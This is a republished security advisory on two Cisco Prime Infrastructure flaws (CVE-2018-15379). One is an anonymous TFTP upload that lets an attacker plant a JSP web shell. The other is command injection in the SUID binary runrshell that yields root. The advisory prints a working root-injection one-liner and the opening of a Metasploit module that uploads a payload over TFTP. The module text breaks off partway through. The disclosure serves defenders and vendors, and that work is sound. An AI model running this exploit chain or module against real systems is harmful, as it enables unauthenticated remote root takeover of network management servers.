{"id":13520,"date":"2018-10-04T14:19:12","date_gmt":"2018-10-04T22:19:12","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/10\/04\/news-7287\/"},"modified":"2018-10-04T14:19:12","modified_gmt":"2018-10-04T22:19:12","slug":"news-7287","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2018\/10\/04\/news-7287\/","title":{"rendered":"SSD Advisory \u2013 Cisco Prime Infrastructure File Inclusion and Remote Command Execution to Privileges Escalation"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Thu, 04 Oct 2018 05:12:22 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> Cisco Prime Infrastructure (CPI) contains two vulnerabilities that when exploited allow an unauthenticated attacker to achieve root privileges and execute code remotely. The first vulnerability is a file upload vulnerability that allows the attacker to upload and execute JSP files as the Apache Tomcat user. The second vulnerability is a privilege escalation to root by bypassing execution restrictions in a SUID binary.<\/p>\n<p><strong>Vendor Response<\/strong><br \/> Cisco has issued an advisory, https:\/\/tools.cisco.com\/security\/center\/content\/CiscoSecurityAdvisory\/cisco-sa-20181003-pi-tftp, which provides a workaround and a fix for the vulnerability. From our assessment the provided fix only addresses the file uploading part of the exploit, not the file inclusion, the ability to execute arbitrary code through it or the privileges escalation issue that the product has.<\/p>\n<p><strong>CVE<\/strong><br \/> CVE-2018-15379<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pedro Ribeiro, has reported this vulnerability to Beyond Security&#8217;s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3723\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> Cisco Prime Infrastructure 3.2 and newer<\/p>\n<p><strong>Vulnerability Details<\/strong><br \/> <em>First Vulnerability: Arbitrary file upload and execution via tftp and Apache Tomcat<\/em><br \/> Attack Vector: Remote<br \/> Constraints: None<\/p>\n<p>Most web applications running on the CPI virtual appliance are deployed under \/opt\/CSCOlumos\/apache-tomcat-&lt;VERSION&gt;\/webapps. One of these applications is &#8220;swimtemp&#8221;, which symlinks to \/localdisk\/tftp:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bb691df2ee90272791562\" class=\"crayon-syntax crayon-theme-shell-default crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">Shell<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ade # ls -l \/opt\/CSCOlumos\/apache-tomcat-8.5.14\/webapps\/  total 16  drwxrwxr-x. 3 root gadmin 4096 Mar 29 19:49 ROOT  drwxrwxr-x. 8 root gadmin 4096 Mar 29 21:44 SSO  lrwxrwxrwx. 1 root gadmin 36 Mar 29 21:32 SSO.war -&gt; \/opt\/CSCOlumos\/wars\/SSO-13.0.201.war  drwxrwxr-x. 4 root gadmin 4096 Mar 29 21:45 ifm_poap_rest  lrwxrwxrwx. 1 root gadmin 45 Mar 29 21:32 ifm_poap_rest.war -&gt; \/opt\/CSCOlumos\/wars\/ifm_poap_rest-3.70.21.war  lrwxrwxrwx. 1 root gadmin 16 Mar 29 19:49 swimtemp -&gt; \/localdisk\/tftp\/  drwxrwxr-x. 22 root gadmin 4096 May 2 15:20 webacsc  lrwxrwxrwx. 1 root gadmin 30 Mar 29 21:32 webacs.war -&gt; \/opt\/CSCOlumos\/wars\/webacs.war<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0056 seconds] -->  <\/p>\n<p>As the name implies, this is the directory used by TFTP to store files. Cisco has also enabled the upload of files to this directory as TFTPD is started with the -c (file create) flag, and it accepts anonymous connections:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bb691df2ee9b504290296\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/usr\/sbin\/in.tftpd &#8211;ipv4 -vv -c &#8211;listen -u prime -a :69 &#8211;retransmit 6000000 -s \/localdisk\/tftp<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2ee9b504290296-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bb691df2ee9b504290296-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sbin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">tftpd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">ipv4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">vv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-v\">listen<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">u<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prime<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">69<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-i\">retransmit<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">localdisk<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tftp<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>The TFTPD port (69) is also open to the world in the virtual appliance firewall, so it is trivial to upload a JSP web shell file using a tftp client to the \/localdisk\/tftp\/ directory.<\/p>\n<p>The web shell will then be available at https:\/\/&lt;IP&gt;\/swimtemp\/&lt;SHELL&gt;, and it will execute as the &#8220;prime&#8221; user, which is an unprivileged user that runs the Apache Tomcat server.<\/p>\n<p><em>Second Vulnerability: runrshell Command Injection with root privileges<\/em><br \/> Attack Vector: Local<br \/> Constraints: None<\/p>\n<p>The CPI virtual appliance contains a binary at \/opt\/CSCOlumos\/bin\/runrshell, which has the SUID bit set and executes as root. It is supposed to start a restricted shell that can only execute commands in \/opt\/CSCOlumos\/rcmds. The decompilation of this function is shown below:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bb691df2eea1194145988\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">C<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int main(int argc, char* argv, char* envp)  {      char dest;      int i;        setuid(0);      setgid(0);      setenv(&#8220;PATH&#8221;, &#8220;\/opt\/CSCOlumos\/rcmds&#8221;, 1);      memcpy(&amp;dest, &#8220;\/bin\/bash -r -c &#8220;&#8221;, 0x12uLL);      for ( i = 1; argc &#8211; 1 &gt;= i; ++i )      {          strcat(&amp;dest, argv[i]);          strcat(&amp;dest, &#8221; &#8220;);      }      strcat(&amp;dest, &#8220;&#8221;&#8221;);      return (system(&amp;dest) &amp; 0xFF00) &gt;&gt; 8;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5bb691df2eea1194145988-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5bb691df2eea1194145988-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">envp<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setuid<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setgid<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">setenv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;PATH&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/opt\/CSCOlumos\/rcmds&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/bin\/bash -r -c &#8220;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x12uLL<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">strcat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">strcat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8221; &#8220;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">strcat<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bb691df2eea1194145988-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">dest<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xFF00<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bb691df2eea1194145988-17\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0042 seconds] -->  <\/p>\n<p>As it can be seen above, the binary uses the system() function to execute:<br \/> \/bin\/bash -r -c &#8220;&lt;CMD&gt;&#8221;. with the PATH set to \/opt\/CSCOlumos\/rcmds, and the restricted (-r) flag passed to bash, meaning that only commands in the PATH can be executed, environment variables cannot be changed or set, directory cannot be changed, etc.<\/p>\n<p>However, due to the way system() function calls &#8220;bash -c&#8221;, it is trivial to inject a command by forcing an end quote after &lt;CMD&gt; and the bash operator &#8216;&amp;&amp;&#8217;:<br \/> [prime@prime34 ~]$ \/opt\/CSCOlumos\/bin\/runrshell &#8216;&#8221; &amp;&amp; \/usr\/bin\/whoami #&#8217;<br \/> root<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5bb691df2eea6742971466\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ##  # This module requires Metasploit: http:\/\/metasploit.com\/download  # Current source: https:\/\/github.com\/rapid7\/metasploit-framework  ##    class MetasploitModule &lt; Msf::Exploit::Remote    Rank = ExcellentRanking      include Msf::Exploit::Remote::HttpClient    include Msf::Exploit::EXE    include Msf::Exploit::FileDropper      def initialize(info = {})      super(update_info(info,        &#8216;Name&#8217;           =&gt; &#8216;Cisco Prime Infrastructure Unauthenticated Remote Code Execution&#8217;,        &#8216;Description&#8217;    =&gt; %q{          Cisco Prime Infrastructure (CPI) contains two basic flaws that when exploited allow          an unauthenticated attacker to achieve remote code execution. The first flaw is a file          upload vulnerability that allows the attacker to upload and execute files as the Apache          Tomcat user; the second is a privilege escalation to root by bypassing execution restrictions          in a SUID binary.            This module exploits these vulnerabilities to achieve unauthenticated remote code execution          as root on the CPI default installation.            This module has been tested with CPI 3.2.0.0.258 and 3.4.0.0.348. Earlier and later versions          might also be affected, although 3.4.0.0.348 is the latest at the time of writing.        },        &#8216;Author&#8217;         =&gt;          [            &#8216;Pedro Ribeiro&#8217;        # Vulnerability discovery and Metasploit module          ],        &#8216;License&#8217;        =&gt; MSF_LICENSE,        &#8216;References&#8217;     =&gt;          [            [ &#8216;CVE&#8217;, &#8216;TODO&#8217; ],            [ &#8216;CVE&#8217;, &#8216;TODO&#8217; ],            [ &#8216;URL&#8217;, &#8216;TODO&#8217; ],            [ &#8216;URL&#8217;, &#8216;TODO&#8217; ]          ],        &#8216;Platform&#8217;       =&gt; &#8216;linux&#8217;,        &#8216;Arch&#8217;           =&gt; [ARCH_X86, ARCH_X64],        &#8216;Targets&#8217;        =&gt;          [            [ &#8216;Cisco Prime Infrastructure&#8217;, {} ]          ],        &#8216;Privileged&#8217;     =&gt; true,        &#8216;DefaultOptions&#8217; =&gt; { &#8216;WfsDelay&#8217; =&gt; 10 },        &#8216;DefaultTarget&#8217;  =&gt; 0,        &#8216;DisclosureDate&#8217; =&gt; &#8216;TODO&#8217;      ))        register_options(        [          OptPort.new(&#8216;RPORT&#8217;, [true, &#8216;The target port&#8217;, 443]),          OptPort.new(&#8216;RPORT_TFTP&#8217;, [true, &#8216;TFTPD port&#8217;, 69]),          OptBool.new(&#8216;SSL&#8217;, [true, &#8216;Use SSL connection&#8217;, true]),          OptString.new(&#8216;TARGETURI&#8217;, [ true,  &#8220;swimtemp path&#8221;, &#8216;\/swimtemp&#8217;])        ])    end        def check      res = send_request_cgi({        &#8216;uri&#8217;    =&gt; normalize_uri(datastore[&#8216;TARGETURI&#8217;], &#8216;swimtemp&#8217;),        &#8216;method&#8217; =&gt; &#8216;GET&#8217;      })      if res &amp;&amp; res.code == 404 &amp;&amp; res.body.length == 0        # at the moment this is the best way to detect        # a 404 in swimtemp only returns the error code with a body length of 0,        # while a 404 to another webapp or to the root returns code plus a body with content        return Exploit::CheckCode::Detected      else        return Exploit::CheckCode::Unknown      end    end        def upload_payload(payload)      lport = datastore[&#8216;LPORT&#8217;] || (1025 + rand(0xffff-1025))      lhost = datastore[&#8216;LHOST&#8217;] || &#8220;0.0.0.0&#8221;      remote_file = rand_text_alpha(rand(14) + 5) + &#8216;.jsp&#8217;        tftp_client = Rex::Proto::TFTP::Client.new(        &#8220;LocalHost&#8221;  =&gt; lhost,        &#8220;LocalPort&#8221;  =&gt; lport,        &#8220;PeerHost&#8221;   =&gt; rhost,        &#8220;PeerPort&#8221;   =&gt; datastore[&#8216;RPORT_TFTP&#8217;],        &#8220;LocalFile&#8221;  =&gt; &#8220;DATA:#{payload}&#8221;,        